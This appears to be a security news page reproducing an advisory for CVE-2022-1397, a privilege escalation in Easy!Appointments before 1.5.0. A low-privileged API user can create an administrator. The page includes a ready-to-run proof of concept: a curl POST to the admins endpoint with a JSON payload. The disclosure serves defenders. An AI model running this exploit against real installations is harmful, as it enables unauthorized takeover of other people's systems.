Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-1397: API Privilege Escalation in easyappointments

API Privilege Escalation in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Full system takeover.

CVE
Open in Source
#js#git#php#auth#sap

Description

Privilege escalation occurs when a user gets access to more resources or functionality than they are normally allowed, and such elevation or changes should have been prevented by the application. This is usually caused by a flaw in the application.

On Easy!Appointments API authorization is checked against the user’s existence, without validating the permissions. As a result, a low privileged user (eg. provider) can create a new admin user via the “/api/v1/admins/” endpoint and take over the system.

Proof of Concept

curl --request POST https://easyappointments.org/index.php/api/v1/admins/ -d @payload.json --user user:pass

payload.json

{
        "id": 100,
        "firstName": "Admin",
        "lastName": "Admin",
        "email": "[email protected]",
        "mobile": null,
        "phone": "111",
        "address": null,
        "city": null,
        "state": null,
        "zip": null,
        "notes": null,
        "timezone": "UTC",
        "settings": {
            "username": "usern@me",
            "password": "p@ssw0rd",
            "notifications": true,
            "calendarView": "default"
        }
    }

Impact

Full system takeover.

Related news

CVE-2022-1397

API Privilege Escalation in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Full system takeover.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE